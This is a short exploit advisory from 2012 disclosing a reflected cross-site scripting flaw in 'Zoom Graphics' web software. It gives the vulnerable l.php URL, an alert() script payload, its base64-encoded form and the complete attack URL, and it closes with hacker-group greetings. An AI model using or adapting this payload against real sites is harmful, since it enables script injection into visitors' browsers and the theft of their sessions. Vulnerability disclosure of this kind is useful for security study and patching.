Zoom Graphics suffers from a base64 encoded cross site scripting vulnerability.
d8c64e07c3d1898fe0ca51017c317208918e0982886c48f640a7dd376d71df7a
+---------------------------------------------------------------------------------------------------------+
# Exploit Title : ZOOM GRAPHICS XSS [B64] Vulnerability
# Date : 2012-08-19
# Author : Avatar Fearless
# Official Site : http://zoom.am/
# Version : x.x.x [UnKnown]
# Tested on : Windows 7 Ultimate x32
# Original Advisory : http://thefear.in/zoomam.txt
# Contact : avatar@hiphopfan.com
# Web Sites : http://anti-armenia.org/ || http://millikuvvetler.net/ || http://mexfi.org/
# Greet`Z To : Meta
+---------------------------------------------------------------------------------------------------------+
[+] Vulnerable :
http://site.tld/l.php?l=2&h=[base64 encode]
[-] Exploit :
Firstable You Will take a XSS Code. Example : '><script>alert(1);</script>. We Have to use only quote not Double quote because if we use than script
will parse double quote. And we will encode this code to Base64 . Output : Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg== So it will be like this :
http://site.tld/zoom/l.php?l=2&h=Jz48c2NyaXB0PmFsZXJ0KDEpOzwvc2NyaXB0Pg==
It is just example
[?] About :
For More Info Contact me.
[@]
Respect To :
All My Bro*S
AA Team
MF Team
MKT Team
+---------------------------------------------------------------------------------------------------------+